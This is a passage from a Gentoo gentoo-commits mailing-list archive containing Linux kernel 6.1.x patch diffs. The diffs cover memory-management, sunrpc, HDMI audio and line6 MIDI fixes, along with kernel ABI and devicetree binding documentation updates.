+@@ -1344,7 +1344,7 @@ move_freelist_tail(struct list_head *freelist, struct page *freepage)
+ }
+ 
+ static void
+-fast_isolate_around(struct compact_control *cc, unsigned long pfn, unsigned long nr_isolated)
++fast_isolate_around(struct compact_control *cc, unsigned long pfn)
+ {
+ 	unsigned long start_pfn, end_pfn;
+ 	struct page *page;
+@@ -1365,21 +1365,13 @@ fast_isolate_around(struct compact_control *cc, unsigned long pfn, unsigned long
+ 	if (!page)
+ 		return;
+ 
+-	/* Scan before */
+-	if (start_pfn != pfn) {
+-		isolate_freepages_block(cc, &start_pfn, pfn, &cc->freepages, 1, false);
+-		if (cc->nr_freepages >= cc->nr_migratepages)
+-			return;
+-	}
+-
+-	/* Scan after */
+-	start_pfn = pfn + nr_isolated;
+-	if (start_pfn < end_pfn)
+-		isolate_freepages_block(cc, &start_pfn, end_pfn, &cc->freepages, 1, false);
++	isolate_freepages_block(cc, &start_pfn, end_pfn, &cc->freepages, 1, false);
+ 
+ 	/* Skip this pageblock in the future as it's full or nearly full */
+ 	if (cc->nr_freepages < cc->nr_migratepages)
+ 		set_pageblock_skip(page);
++
++	return;
+ }
+ 
+ /* Search orders in round-robin fashion */
+@@ -1556,7 +1548,7 @@ fast_isolate_freepages(struct compact_control *cc)
+ 		return cc->free_pfn;
+ 
+ 	low_pfn = page_to_pfn(page);
+-	fast_isolate_around(cc, low_pfn, nr_isolated);
++	fast_isolate_around(cc, low_pfn);
+ 	return low_pfn;
+ }
+ 
+diff --git a/mm/kmsan/hooks.c b/mm/kmsan/hooks.c
+index 35f6b6e6a908c..3807502766a3e 100644
+--- a/mm/kmsan/hooks.c
++++ b/mm/kmsan/hooks.c
+@@ -260,6 +260,7 @@ void kmsan_handle_urb(const struct urb *urb, bool is_out)
+ 					       urb->transfer_buffer_length,
+ 					       /*checked*/ false);
+ }
++EXPORT_SYMBOL_GPL(kmsan_handle_urb);
+ 
+ static void kmsan_handle_dma_page(const void *addr, size_t size,
+ 				  enum dma_data_direction dir)
+diff --git a/mm/kmsan/kmsan_test.c b/mm/kmsan/kmsan_test.c
+index 9a29ea2dbfb9b..1328636cbd6cd 100644
+--- a/mm/kmsan/kmsan_test.c
++++ b/mm/kmsan/kmsan_test.c
+@@ -22,6 +22,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/string.h>
+ #include <linux/tracepoint.h>
++#include <linux/vmalloc.h>
+ #include <trace/events/printk.h>
+ 
+ static DEFINE_PER_CPU(int, per_cpu_var);
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index 61aa9aedb7289..02c8a712282f1 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -1540,6 +1540,7 @@ SYSCALL_DEFINE4(set_mempolicy_home_node, unsigned long, start, unsigned long, le
+ 		 * the home node for vmas we already updated before.
+ 		 */
+ 		if (new->mode != MPOL_BIND && new->mode != MPOL_PREFERRED_MANY) {
++			mpol_put(new);
+ 			err = -EOPNOTSUPP;
+ 			break;
+ 		}
+diff --git a/mm/mremap.c b/mm/mremap.c
+index e465ffe279bb0..fe587c5d65913 100644
+--- a/mm/mremap.c
++++ b/mm/mremap.c
+@@ -1016,7 +1016,8 @@ SYSCALL_DEFINE5(mremap, unsigned long, addr, unsigned long, old_len,
+ 			long pages = (new_len - old_len) >> PAGE_SHIFT;
+ 			unsigned long extension_start = addr + old_len;
+ 			unsigned long extension_end = addr + new_len;
+-			pgoff_t extension_pgoff = vma->vm_pgoff + (old_len >> PAGE_SHIFT);
++			pgoff_t extension_pgoff = vma->vm_pgoff +
++				((extension_start - vma->vm_start) >> PAGE_SHIFT);
+ 
+ 			if (vma->vm_flags & VM_ACCOUNT) {
+ 				if (security_vm_enough_memory_mm(mm, pages)) {
+diff --git a/net/sunrpc/auth_gss/svcauth_gss.c b/net/sunrpc/auth_gss/svcauth_gss.c
+index bcd74dddbe2db..9a5db285d4ae5 100644
+--- a/net/sunrpc/auth_gss/svcauth_gss.c
++++ b/net/sunrpc/auth_gss/svcauth_gss.c
+@@ -1162,18 +1162,23 @@ static int gss_read_proxy_verf(struct svc_rqst *rqstp,
+ 		return res;
+ 
+ 	inlen = svc_getnl(argv);
+-	if (inlen > (argv->iov_len + rqstp->rq_arg.page_len))
++	if (inlen > (argv->iov_len + rqstp->rq_arg.page_len)) {
++		kfree(in_handle->data);
+ 		return SVC_DENIED;
++	}
+ 
+ 	pages = DIV_ROUND_UP(inlen, PAGE_SIZE);
+ 	in_token->pages = kcalloc(pages, sizeof(struct page *), GFP_KERNEL);
+-	if (!in_token->pages)
++	if (!in_token->pages) {
++		kfree(in_handle->data);
+ 		return SVC_DENIED;
++	}
+ 	in_token->page_base = 0;
+ 	in_token->page_len = inlen;
+ 	for (i = 0; i < pages; i++) {
+ 		in_token->pages[i] = alloc_page(GFP_KERNEL);
+ 		if (!in_token->pages[i]) {
++			kfree(in_handle->data);
+ 			gss_free_in_token_pages(in_token);
+ 			return SVC_DENIED;
+ 		}
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 8015e44712678..386dd9d9143f9 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -167,6 +167,7 @@ struct hdmi_spec {
+ 	struct hdmi_ops ops;
+ 
+ 	bool dyn_pin_out;
++	bool static_pcm_mapping;
+ 	/* hdmi interrupt trigger control flag for Nvidia codec */
+ 	bool hdmi_intr_trig_ctrl;
+ 	bool nv_dp_workaround; /* workaround DP audio infoframe for Nvidia */
+@@ -1525,13 +1526,16 @@ static void update_eld(struct hda_codec *codec,
+ 	 */
+ 	pcm_jack = pin_idx_to_pcm_jack(codec, per_pin);
+ 
+-	if (eld->eld_valid) {
+-		hdmi_attach_hda_pcm(spec, per_pin);
+-		hdmi_pcm_setup_pin(spec, per_pin);
+-	} else {
+-		hdmi_pcm_reset_pin(spec, per_pin);
+-		hdmi_detach_hda_pcm(spec, per_pin);
++	if (!spec->static_pcm_mapping) {
++		if (eld->eld_valid) {
++			hdmi_attach_hda_pcm(spec, per_pin);
++			hdmi_pcm_setup_pin(spec, per_pin);
++		} else {
++			hdmi_pcm_reset_pin(spec, per_pin);
++			hdmi_detach_hda_pcm(spec, per_pin);
++		}
+ 	}
++
+ 	/* if pcm_idx == -1, it means this is in monitor connection event
+ 	 * we can get the correct pcm_idx now.
+ 	 */
+@@ -2281,8 +2285,8 @@ static int generic_hdmi_build_pcms(struct hda_codec *codec)
+ 	struct hdmi_spec *spec = codec->spec;
+ 	int idx, pcm_num;
+ 
+-	/* limit the PCM devices to the codec converters */
+-	pcm_num = spec->num_cvts;
++	/* limit the PCM devices to the codec converters or available PINs */
++	pcm_num = min(spec->num_cvts, spec->num_pins);
+ 	codec_dbg(codec, "hdmi: pcm_num set to %d\n", pcm_num);
+ 
+ 	for (idx = 0; idx < pcm_num; idx++) {
+@@ -2379,6 +2383,11 @@ static int generic_hdmi_build_controls(struct hda_codec *codec)
+ 		struct hdmi_spec_per_pin *per_pin = get_pin(spec, pin_idx);
+ 		struct hdmi_eld *pin_eld = &per_pin->sink_eld;
+ 
++		if (spec->static_pcm_mapping) {
++			hdmi_attach_hda_pcm(spec, per_pin);
++			hdmi_pcm_setup_pin(spec, per_pin);
++		}
++
+ 		pin_eld->eld_valid = false;
+ 		hdmi_present_sense(per_pin, 0);
+ 	}
+@@ -4419,6 +4428,8 @@ static int patch_atihdmi(struct hda_codec *codec)
+ 
+ 	spec = codec->spec;
+ 
++	spec->static_pcm_mapping = true;
++
+ 	spec->ops.pin_get_eld = atihdmi_pin_get_eld;
+ 	spec->ops.pin_setup_infoframe = atihdmi_pin_setup_infoframe;
+ 	spec->ops.pin_hbr_setup = atihdmi_pin_hbr_setup;
+diff --git a/sound/usb/line6/driver.c b/sound/usb/line6/driver.c
+index 59faa5a9a7141..b67617b68e509 100644
+--- a/sound/usb/line6/driver.c
++++ b/sound/usb/line6/driver.c
+@@ -304,7 +304,8 @@ static void line6_data_received(struct urb *urb)
+ 		for (;;) {
+ 			done =
+ 				line6_midibuf_read(mb, line6->buffer_message,
+-						LINE6_MIDI_MESSAGE_MAXLEN);
++						   LINE6_MIDI_MESSAGE_MAXLEN,
++						   LINE6_MIDIBUF_READ_RX);
+ 
+ 			if (done <= 0)
+ 				break;
+diff --git a/sound/usb/line6/midi.c b/sound/usb/line6/midi.c
+index ba0e2b7e8fe19..0838632c788e4 100644
+--- a/sound/usb/line6/midi.c
++++ b/sound/usb/line6/midi.c
+@@ -44,7 +44,8 @@ static void line6_midi_transmit(struct snd_rawmidi_substream *substream)
+ 	int req, done;
+ 
+ 	for (;;) {
+-		req = min(line6_midibuf_bytes_free(mb), line6->max_packet_size);
++		req = min3(line6_midibuf_bytes_free(mb), line6->max_packet_size,
++			   LINE6_FALLBACK_MAXPACKETSIZE);
+ 		done = snd_rawmidi_transmit_peek(substream, chunk, req);
+ 
+ 		if (done == 0)
+@@ -56,7 +57,8 @@ static void line6_midi_transmit(struct snd_rawmidi_substream *substream)
+ 
+ 	for (;;) {
+ 		done = line6_midibuf_read(mb, chunk,
+-					  LINE6_FALLBACK_MAXPACKETSIZE);
++					  LINE6_FALLBACK_MAXPACKETSIZE,
++					  LINE6_MIDIBUF_READ_TX);
+ 
+ 		if (done == 0)
+ 			break;
+diff --git a/sound/usb/line6/midibuf.c b/sound/usb/line6/midibuf.c
+index 6a70463f82c4e..e7f830f7526c9 100644
+--- a/sound/usb/line6/midibuf.c
++++ b/sound/usb/line6/midibuf.c
+@@ -9,6 +9,7 @@
+ 
+ #include "midibuf.h"
+ 
++
+ static int midibuf_message_length(unsigned char code)
+ {
+ 	int message_length;
+@@ -20,12 +21,7 @@ static int midibuf_message_length(unsigned char code)
+ 
+ 		message_length = length[(code >> 4) - 8];
+ 	} else {
+-		/*
+-		   Note that according to the MIDI specification 0xf2 is
+-		   the "Song Position Pointer", but this is used by Line 6
+-		   to send sysex messages to the host.
+-		 */
+-		static const int length[] = { -1, 2, -1, 2, -1, -1, 1, 1, 1, 1,
++		static const int length[] = { -1, 2, 2, 2, -1, -1, 1, 1, 1, -1,
+ 			1, 1, 1, -1, 1, 1
+ 		};
+ 		message_length = length[code & 0x0f];
+@@ -125,7 +121,7 @@ int line6_midibuf_write(struct midi_buffer *this, unsigned char *data,
+ }
+ 
+ int line6_midibuf_read(struct midi_buffer *this, unsigned char *data,
+-		       int length)
++		       int length, int read_type)
+ {
+ 	int bytes_used;
+ 	int length1, length2;
+@@ -148,9 +144,22 @@ int line6_midibuf_read(struct midi_buffer *this, unsigned char *data,
+ 
+ 	length1 = this->size - this->pos_read;
+ 
+-	/* check MIDI command length */
+ 	command = this->buf[this->pos_read];
++	/*
++	   PODxt always has status byte lower nibble set to 0010,
++	   when it means to send 0000, so we correct if here so
++	   that control/program changes come on channel 1 and
++	   sysex message status byte is correct
++	 */
++	if (read_type == LINE6_MIDIBUF_READ_RX) {
++		if (command == 0xb2 || command == 0xc2 || command == 0xf2) {
++			unsigned char fixed = command & 0xf0;
++			this->buf[this->pos_read] = fixed;
++			command = fixed;
++		}
++	}
+ 
++	/* check MIDI command length */
+ 	if (command & 0x80) {
+ 		midi_length = midibuf_message_length(command);
+ 		this->command_prev = command;
+diff --git a/sound/usb/line6/midibuf.h b/sound/usb/line6/midibuf.h
+index 124a8f9f7e96c..542e8d836f87d 100644
+--- a/sound/usb/line6/midibuf.h
++++ b/sound/usb/line6/midibuf.h
+@@ -8,6 +8,9 @@
+ #ifndef MIDIBUF_H
+ #define MIDIBUF_H
+ 
++#define LINE6_MIDIBUF_READ_TX 0
++#define LINE6_MIDIBUF_READ_RX 1
++
+ struct midi_buffer {
+ 	unsigned char *buf;
+ 	int size;
+@@ -23,7 +26,7 @@ extern void line6_midibuf_destroy(struct midi_buffer *mb);
+ extern int line6_midibuf_ignore(struct midi_buffer *mb, int length);
+ extern int line6_midibuf_init(struct midi_buffer *mb, int size, int split);
+ extern int line6_midibuf_read(struct midi_buffer *mb, unsigned char *data,
+-			      int length);
++			      int length, int read_type);
+ extern void line6_midibuf_reset(struct midi_buffer *mb);
+ extern int line6_midibuf_write(struct midi_buffer *mb, unsigned char *data,
+ 			       int length);
+diff --git a/sound/usb/line6/pod.c b/sound/usb/line6/pod.c
+index cd41aa7f03851..d173971e5f029 100644
+--- a/sound/usb/line6/pod.c
++++ b/sound/usb/line6/pod.c
+@@ -159,8 +159,9 @@ static struct line6_pcm_properties pod_pcm_properties = {
+ 	.bytes_per_channel = 3 /* SNDRV_PCM_FMTBIT_S24_3LE */
+ };
+ 
++
+ static const char pod_version_header[] = {
+-	0xf2, 0x7e, 0x7f, 0x06, 0x02
++	0xf0, 0x7e, 0x7f, 0x06, 0x02
+ };
+ 
+ static char *pod_alloc_sysex_buffer(struct usb_line6_pod *pod, int code,
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index a7f1e6c8bb0a7..51494c3002d91 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -207,7 +207,7 @@ static bool __dead_end_function(struct objtool_file *file, struct symbol *func,
+ 		return false;
+ 
+ 	insn = find_insn(file, func->sec, func->offset);
+-	if (!insn->func)
++	if (!insn || !insn->func)
+ 		return false;
+ 
+ 	func_for_each_insn(file, func, insn) {


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2022-12-31 15:28 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2022-12-31 15:28 UTC (permalink / raw
  To: gentoo-commits

commit:     99cfecfe6b7115f295b20864a9a3292fca78347f
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Dec 31 15:27:35 2022 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Dec 31 15:27:35 2022 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=99cfecfe

Linux patch 6.1.2
Fix for BMQ Patch Bug: https://bugs.gentoo.org/888043

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                       |     4 +
 1001_linux-6.1.2.patch                            | 45529 ++++++++++++++++++++
 5021_sched-alt-missing-rq-lock-irq-function.patch |    30 +
 3 files changed, 45563 insertions(+)

diff --git a/0000_README b/0000_README
index d85dd44f..7f1d2ce2 100644
--- a/0000_README
+++ b/0000_README
@@ -47,6 +47,10 @@ Patch:  1000_linux-6.1.1.patch
 From:   http://www.kernel.org
 Desc:   Linux 6.1.1
 
+Patch:  1001_linux-6.1.2.patch
+From:   http://www.kernel.org
+Desc:   Linux 6.1.2
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1001_linux-6.1.2.patch b/1001_linux-6.1.2.patch
new file mode 100644
index 00000000..dce6fb3b
--- /dev/null
+++ b/1001_linux-6.1.2.patch
@@ -0,0 +1,45529 @@
+diff --git a/Documentation/ABI/stable/sysfs-driver-dma-idxd b/Documentation/ABI/stable/sysfs-driver-dma-idxd
+index 8e2c2c405db22..3becc9a82bdf6 100644
+--- a/Documentation/ABI/stable/sysfs-driver-dma-idxd
++++ b/Documentation/ABI/stable/sysfs-driver-dma-idxd
+@@ -22,6 +22,7 @@ Date:           Oct 25, 2019
+ KernelVersion:  5.6.0
+ Contact:        dmaengine@vger.kernel.org
+ Description:    The largest number of work descriptors in a batch.
++                It's not visible when the device does not support batch.
+ 
+ What:           /sys/bus/dsa/devices/dsa<m>/max_work_queues_size
+ Date:           Oct 25, 2019
+@@ -49,6 +50,8 @@ Description:    The total number of read buffers supported by this device.
+ 		The read buffers represent resources within the DSA
+ 		implementation, and these resources are allocated by engines to
+ 		support operations. See DSA spec v1.2 9.2.4 Total Read Buffers.
++		It's not visible when the device does not support Read Buffer
++		allocation control.
+ 
+ What:           /sys/bus/dsa/devices/dsa<m>/max_transfer_size
+ Date:           Oct 25, 2019
+@@ -122,6 +125,8 @@ Contact:        dmaengine@vger.kernel.org
+ Description:    The maximum number of read buffers that may be in use at
+ 		one time by operations that access low bandwidth memory in the
+ 		device. See DSA spec v1.2 9.2.8 GENCFG on Global Read Buffer Limit.
++		It's not visible when the device does not support Read Buffer
++		allocation control.
+ 
+ What:		/sys/bus/dsa/devices/dsa<m>/cmd_status
+ Date:		Aug 28, 2020
+@@ -205,6 +210,7 @@ KernelVersion:	5.10.0
+ Contact:	dmaengine@vger.kernel.org
+ Description:	The max batch size for this workqueue. Cannot exceed device
+ 		max batch size. Configurable parameter.
++		It's not visible when the device does not support batch.
+ 
+ What:		/sys/bus/dsa/devices/wq<m>.<n>/ats_disable
+ Date:		Nov 13, 2020
+@@ -250,6 +256,8 @@ KernelVersion:	5.17.0
+ Contact:	dmaengine@vger.kernel.org
+ Description:	Enable the use of global read buffer limit for the group. See DSA
+ 		spec v1.2 9.2.18 GRPCFG Use Global Read Buffer Limit.
++		It's not visible when the device does not support Read Buffer
++		allocation control.
+ 
+ What:		/sys/bus/dsa/devices/group<m>.<n>/read_buffers_allowed
+ Date:		Dec 10, 2021
+@@ -258,6 +266,8 @@ Contact:	dmaengine@vger.kernel.org
+ Description:	Indicates max number of read buffers that may be in use at one time
+ 		by all engines in the group. See DSA spec v1.2 9.2.18 GRPCFG Read
+ 		Buffers Allowed.
++		It's not visible when the device does not support Read Buffer
++		allocation control.
+ 
+ What:		/sys/bus/dsa/devices/group<m>.<n>/read_buffers_reserved
+ Date:		Dec 10, 2021
+@@ -266,6 +276,8 @@ Contact:	dmaengine@vger.kernel.org
+ Description:	Indicates the number of Read Buffers reserved for the use of
+ 		engines in the group. See DSA spec v1.2 9.2.18 GRPCFG Read Buffers
+ 		Reserved.
++		It's not visible when the device does not support Read Buffer
++		allocation control.
+ 
+ What:		/sys/bus/dsa/devices/group<m>.<n>/desc_progress_limit
+ Date:		Sept 14, 2022
+diff --git a/Documentation/ABI/testing/sysfs-bus-spi-devices-spi-nor b/Documentation/ABI/testing/sysfs-bus-spi-devices-spi-nor
+index d76cd3946434d..e9ef69aef20b1 100644
+--- a/Documentation/ABI/testing/sysfs-bus-spi-devices-spi-nor
++++ b/Documentation/ABI/testing/sysfs-bus-spi-devices-spi-nor
+@@ -5,6 +5,9 @@ Contact:	linux-mtd@lists.infradead.org
+ Description:	(RO) The JEDEC ID of the SPI NOR flash as reported by the
+ 		flash device.
+ 
++		The attribute is not present if the flash doesn't support
++		the "Read JEDEC ID" command (9Fh). This is the case for
++		non-JEDEC compliant flashes.
+ 
+ What:		/sys/bus/spi/devices/.../spi-nor/manufacturer
+ Date:		April 2021
+diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
+index 98d1b198b2b4c..c2c64c1b706ff 100644
+--- a/Documentation/admin-guide/sysctl/kernel.rst
++++ b/Documentation/admin-guide/sysctl/kernel.rst
+@@ -1314,6 +1314,29 @@ watchdog work to be queued by the watchdog timer function, otherwise the NMI
+ watchdog — if enabled — can detect a hard lockup condition.
+ 
+ 
++split_lock_mitigate (x86 only)
++==============================
++
++On x86, each "split lock" imposes a system-wide performance penalty. On larger
++systems, large numbers of split locks from unprivileged users can result in
++denials of service to well-behaved and potentially more important users.
++
++The kernel mitigates these bad users by detecting split locks and imposing
++penalties: forcing them to wait and only allowing one core to execute split
++locks at a time.
++
++These mitigations can make those bad applications unbearably slow. Setting
++split_lock_mitigate=0 may restore some application performance, but will also
++increase system exposure to denial of service attacks from split lock users.
++
++= ===================================================================
++0 Disable the mitigation mode - just warns the split lock on kernel log
++  and exposes the system to denials of service from the split lockers.
++1 Enable the mitigation mode (this is the default) - penalizes the split
++  lockers with intentional performance degradation.
++= ===================================================================
++
++
+ stack_erasing
+ =============
+ 
+diff --git a/Documentation/devicetree/bindings/input/azoteq,iqs7222.yaml b/Documentation/devicetree/bindings/input/azoteq,iqs7222.yaml
+index 02e605fac408d..9ddba7f2e7aa6 100644
+--- a/Documentation/devicetree/bindings/input/azoteq,iqs7222.yaml
++++ b/Documentation/devicetree/bindings/input/azoteq,iqs7222.yaml
+@@ -473,9 +473,6 @@ patternProperties:
+               Specifies whether the event is to be interpreted as a key (1)
+               or a switch (5).
+ 
+-        required:
+-          - linux,code
+-
+         additionalProperties: false
+ 
+     dependencies:
+@@ -501,7 +498,7 @@ patternProperties:
+ 
+       azoteq,slider-size:
+         $ref: /schemas/types.yaml#/definitions/uint32
+-        minimum: 0
++        minimum: 1
+         maximum: 65535
+         description:
+           Specifies the slider's one-dimensional resolution, equal to the
+@@ -575,9 +572,9 @@ patternProperties:
+           linux,code: true
+ 
+           azoteq,gesture-max-ms:
+-            multipleOf: 4
++            multipleOf: 16
+             minimum: 0
+-            maximum: 1020
++            maximum: 4080
+             description:
+               Specifies the length of time (in ms) within which a tap, swipe
+               or flick gesture must be completed in order to be acknowledged
+@@ -585,9 +582,9 @@ patternProperties:
+               gesture applies to all remaining swipe or flick gestures.
+ 
+           azoteq,gesture-min-ms:
+-            multipleOf: 4
++            multipleOf: 16
+             minimum: 0
+-            maximum: 124
++            maximum: 496
+             description:
+               Specifies the length of time (in ms) for which a tap gesture must
+               be held in order to be acknowledged by the device.
+@@ -620,9 +617,6 @@ patternProperties:
+               GPIO, they must all be of the same type (proximity, touch or
+               slider gesture).
+ 
+-        required:
+-          - linux,code
+-
+         additionalProperties: false
+ 
+     required:
+@@ -693,6 +687,7 @@ allOf:
+           properties:
+             azoteq,slider-size:
+               multipleOf: 16
++              minimum: 16
+               maximum: 4080
+ 
+             azoteq,top-speed:
+@@ -935,14 +930,14 @@ examples:
+ 
+                             event-tap {
+                                     linux,code = <KEY_PLAYPAUSE>;
+-                                    azoteq,gesture-max-ms = <600>;
+-                                    azoteq,gesture-min-ms = <24>;
++                                    azoteq,gesture-max-ms = <400>;
++                                    azoteq,gesture-min-ms = <32>;
+                             };
+ 
+                             event-flick-pos {
+                                     linux,code = <KEY_NEXTSONG>;
+-                                    azoteq,gesture-max-ms = <600>;
+-                                    azoteq,gesture-dist = <816>;
++                                    azoteq,gesture-max-ms = <800>;
++                                    azoteq,gesture-dist = <800>;
+                             };
+ 
+                             event-flick-neg {
+diff --git a/Documentation/devicetree/bindings/mfd/qcom,spmi-pmic.yaml b/Documentation/devicetree/bindings/mfd/qcom,spmi-pmic.yaml
+index 6a3e3ede1ede7..777f2da52f1ed 100644
+--- a/Documentation/devicetree/bindings/mfd/qcom,spmi-pmic.yaml
++++ b/Documentation/devicetree/bindings/mfd/qcom,spmi-pmic.yaml
+@@ -98,6 +98,10 @@ properties:
+     type: object
+     $ref: /schemas/regulator/qcom,spmi-regulator.yaml#
+ 
++  pwm:
++    type: object
++    $ref: /schemas/leds/leds-qcom-lpg.yaml#
++
+ patternProperties:
+   "^adc@[0-9a-f]+$":
+     type: object
+@@ -123,10 +127,6 @@ patternProperties:
+     type: object
+     $ref: /schemas/power/reset/qcom,pon.yaml#
+ 
+-  "pwm@[0-9a-f]+$":
+-    type: object
+-    $ref: /schemas/leds/leds-qcom-lpg.yaml#
+-
+   "^rtc@[0-9a-f]+$":
+     type: object
+     $ref: /schemas/rtc/qcom-pm8xxx-rtc.yaml#
+diff --git a/Documentation/devicetree/bindings/pci/fsl,imx6q-pcie.yaml b/Documentation/devicetree/bindings/pci/fsl,imx6q-pcie.yaml
+index 376e739bcad40..49b4f7a32e71e 100644
+--- a/Documentation/devicetree/bindings/pci/fsl,imx6q-pcie.yaml
++++ b/Documentation/devicetree/bindings/pci/fsl,imx6q-pcie.yaml
+@@ -14,9 +14,6 @@ description: |+
+   This PCIe host controller is based on the Synopsys DesignWare PCIe IP
+   and thus inherits all the common properties defined in snps,dw-pcie.yaml.
+ 
+-allOf:
+-  - $ref: /schemas/pci/snps,dw-pcie.yaml#
+-
+ properties:
+   compatible:
+     enum:
+@@ -61,7 +58,7 @@ properties:
+       - const: pcie
+       - const: pcie_bus
+       - const: pcie_phy
+-      - const: pcie_inbound_axi for imx6sx-pcie, pcie_aux for imx8mq-pcie
++      - enum: [ pcie_inbound_axi, pcie_aux ]
+ 
+   num-lanes:
+     const: 1
+@@ -175,6 +172,47 @@ required:
+   - clocks
+   - clock-names
+ 
++allOf:
++  - $ref: /schemas/pci/snps,dw-pcie.yaml#
++  - if:
++      properties:
++        compatible:
++          contains:
++            const: fsl,imx6sx-pcie
++    then:
++      properties:
++        clock-names:
++          items:
++            - {}
++            - {}
++            - {}
++            - const: pcie_inbound_axi
++  - if:
++      properties:
++        compatible:
++          contains:
++            const: fsl,imx8mq-pcie
++    then:
++      properties:
++        clock-names:
++          items:
++            - {}
++            - {}
++            - {}
++            - const: pcie_aux
++  - if:
++      properties:
++        compatible:
++          not:
++            contains:
++              enum:
++                - fsl,imx6sx-pcie
++                - fsl,imx8mq-pcie
++    then:
++      properties:
++        clock-names:
++          maxItems: 3
++
+ unevaluatedProperties: false
+ 
+ examples:
+diff --git a/Documentation/devicetree/bindings/pci/toshiba,visconti-pcie.yaml b/Documentation/devicetree/bindings/pci/toshiba,visconti-pcie.yaml
+index 48ed227fc5b9e..53da2edd7c9ab 100644
+--- a/Documentation/devicetree/bindings/pci/toshiba,visconti-pcie.yaml
++++ b/Documentation/devicetree/bindings/pci/toshiba,visconti-pcie.yaml
+@@ -36,7 +36,7 @@ properties:
+       - const: mpu
+ 
+   interrupts:
+-    maxItems: 1
++    maxItems: 2
+ 
+   clocks:
+     items:
+@@ -94,8 +94,9 @@ examples:
+             #interrupt-cells = <1>;
+             ranges = <0x81000000 0 0x40000000 0 0x40000000 0 0x00010000>,
+                      <0x82000000 0 0x50000000 0 0x50000000 0 0x20000000>;
+-            interrupts = <GIC_SPI 215 IRQ_TYPE_LEVEL_HIGH>;
+-            interrupt-names = "intr";
++            interrupts = <GIC_SPI 211 IRQ_TYPE_LEVEL_HIGH>,
++                         <GIC_SPI 215 IRQ_TYPE_LEVEL_HIGH>;
++            interrupt-names = "msi", "intr";
+             interrupt-map-mask = <0 0 0 7>;
+             interrupt-map =
+                 <0 0 0 1 &gic GIC_SPI 215 IRQ_TYPE_LEVEL_HIGH
+diff --git a/Documentation/devicetree/bindings/pinctrl/mediatek,mt7986-pinctrl.yaml b/Documentation/devicetree/bindings/pinctrl/mediatek,mt7986-pinctrl.yaml
+index 89b8f3dd67a19..3342847dcb19a 100644
+--- a/Documentation/devicetree/bindings/pinctrl/mediatek,mt7986-pinctrl.yaml
++++ b/Documentation/devicetree/bindings/pinctrl/mediatek,mt7986-pinctrl.yaml
+@@ -87,6 +87,8 @@ patternProperties:
+           "wifi_led"        "led"       1, 2
+           "i2c"             "i2c"       3, 4
+           "uart1_0"         "uart"      7, 8, 9, 10
++          "uart1_rx_tx"     "uart"      42, 43
++          "uart1_cts_rts"   "uart"      44, 45
+           "pcie_clk"        "pcie"      9
+           "pcie_wake"       "pcie"      10
+           "spi1_0"          "spi"       11, 12, 13, 14
+@@ -98,9 +100,11 @@ patternProperties:
+           "emmc_45"         "emmc"      22, 23, 24, 25, 26, 27, 28, 29, 30,
+                                         31, 32
+           "spi1_1"          "spi"       23, 24, 25, 26
+-          "uart1_2"         "uart"      29, 30, 31, 32
++          "uart1_2_rx_tx"   "uart"      29, 30
++          "uart1_2_cts_rts" "uart"      31, 32
+           "uart1_1"         "uart"      23, 24, 25, 26
+-          "uart2_0"         "uart"      29, 30, 31, 32
++          "uart2_0_rx_tx"   "uart"      29, 30
++          "uart2_0_cts_rts" "uart"      31, 32
+           "spi0"            "spi"       33, 34, 35, 36
+           "spi0_wp_hold"    "spi"       37, 38
+           "uart1_3_rx_tx"   "uart"      35, 36
+@@ -157,7 +161,7 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [emmc, emmc_rst]
++                  enum: [emmc_45, emmc_51]
+           - if:
+               properties:
+                 function:
+@@ -221,8 +225,12 @@ patternProperties:
+             then:
+               properties:
+                 groups:
+-                  enum: [uart1_0, uart1_1, uart1_2, uart1_3_rx_tx,
+-                         uart1_3_cts_rts, uart2_0, uart2_1, uart0, uart1, uart2]
++                  items:
++                    enum: [uart1_0, uart1_rx_tx, uart1_cts_rts, uart1_1,
++                           uart1_2_rx_tx, uart1_2_cts_rts, uart1_3_rx_tx,
++                           uart1_3_cts_rts, uart2_0_rx_tx, uart2_0_cts_rts,
++                           uart2_1, uart0, uart1, uart2]
++                  maxItems: 2
+           - if:
+               properties:
+                 function:
+@@ -356,6 +364,27 @@ examples:
+         interrupt-parent = <&gic>;
+         #interrupt-cells = <2>;
+ 
++        pcie_pins: pcie-pins {
++          mux {
++            function = "pcie";
++            groups = "pcie_clk", "pcie_wake", "pcie_pereset";
++          };
++        };
++
++        pwm_pins: pwm-pins {
++          mux {
++            function = "pwm";
++            groups = "pwm0", "pwm1_0";
++          };
++        };
++
++        spi0_pins: spi0-pins {
++          mux {
++            function = "spi";
++            groups = "spi0", "spi0_wp_hold";
++          };
++        };
++
+         uart1_pins: uart1-pins {
+           mux {
+             function = "uart";
+@@ -363,6 +392,13 @@ examples:
+           };
+         };
+ 
++        uart1_3_pins: uart1-3-pins {
++          mux {
++            function = "uart";
++            groups = "uart1_3_rx_tx", "uart1_3_cts_rts";
++          };
++        };
++
+         uart2_pins: uart2-pins {
+           mux {
+             function = "uart";
+diff --git a/Documentation/devicetree/bindings/pwm/microchip,corepwm.yaml b/Documentation/devicetree/bindings/pwm/microchip,corepwm.yaml
+index a7fae1772a81b..cd8e9a8907f84 100644
+--- a/Documentation/devicetree/bindings/pwm/microchip,corepwm.yaml
++++ b/Documentation/devicetree/bindings/pwm/microchip,corepwm.yaml
